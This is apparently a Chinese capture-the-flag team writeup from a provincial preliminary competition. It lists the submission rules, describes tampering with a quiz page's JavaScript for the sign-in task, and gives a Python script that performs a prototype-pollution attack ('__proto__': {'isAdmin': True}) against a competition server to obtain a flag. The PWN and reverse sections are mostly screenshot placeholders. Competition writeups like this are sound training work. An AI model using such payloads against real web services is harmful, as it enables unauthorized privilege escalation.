11.2省赛初赛

团队-解题思路

请注意

  1. 解题过程中,关键步骤不可省略,不可含糊其辞、一笔带过。

  2. 解题过程中如是自己编写的脚本,不可省略,不可截图(代码字体可以调小;而如果代码太长,则贴关键代码函数)。

  3. 所有解出的题目都必须书写WRITEUP,缺少一个则视该WRITEUP无效,成绩将无效。

  4. WRITEUP如过于简略和敷衍,导致无法形成逻辑链条推断出对题目有分析和解决的能力,该WRITEUP可能被视为无效,成绩将无效。

  5. 提交PDF版本即可。

6.必须包含获得flag截图。

7.每只队伍由队长统一提交一份解题思路即可,所有解题过程需保存在一个pdf内上传。

8.平台仅保留队伍最后一份解题思路,此前提交的解题思路将会自动覆盖。

1.** 团队信息**

团队名称:Alkaid

学校:浙江工商大学

队员组成:王一涵 叶凌俊 周晋逸

排名:151

2.** **解题情况

答题情况截图

1730537910924-a01429f9-f4dc-421a-8e20-7543e0c739c0.png

3.** 具体WP**

题目按照顺序填写

签到

题目以一名称:网安知识大挑战

1730529899334-862883c5-5d4d-4d2e-8742-c689c404102d.png

把原来显示重来的js代码也换成成功 然后随便乱答就可以了

1730530064259-610de2c9-b151-47fe-b129-1aa296ae459c.png

2、

1730527332488-20636e2d-42dd-40d0-b25f-aed033fe887d.png

WEB

题目一名称: easyjs

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
import requests
def create_note():
response = requests.post('http://139.155.126.78:38372/api/notes', json={
'id': 'myNote',
'__proto__': {
'isAdmin': True
}
})
return response


def get_flag():
response = requests.get('http://139.155.126.78:38372/api/flag', headers={
'note-id': 'myNote'
})
return response


if __name__ == "__main__":
create_response = create_note()

if create_response.status_code == 200:
print("Note created successfully.")


flag_response = get_flag()

if flag_response.status_code == 200:
print("Flag:", flag_response.json().get('flag'))
else:
print("Failed to get flag:", flag_response.json())
else:
print("Failed to create note:", create_response.json())

1730531838965-b67c4a74-583e-43b2-93eb-0a9f964013d0.png

请注意添加关键步骤截图

获取flag截图

题目二名称:

PWN

1

1730530286639-29bfddc4-8ece-48c3-8661-6f243f12b587.png

1730530663624-6f902e56-b169-45a2-afb7-ec915e47140d.png

1730530269056-f6b51e69-feb5-4d3f-98c1-1e88d57d9df9.png


REVERSE

更新: 2024-11-02 16:58:36
原文: https://www.yuque.com/chaye-apqbl/vsc85q/cp3xgbk1detxdf74


http://example.com/2026/01/19/WP/2024/11.2省赛初赛/
Author
chaye
Posted on
January 19, 2026
Licensed under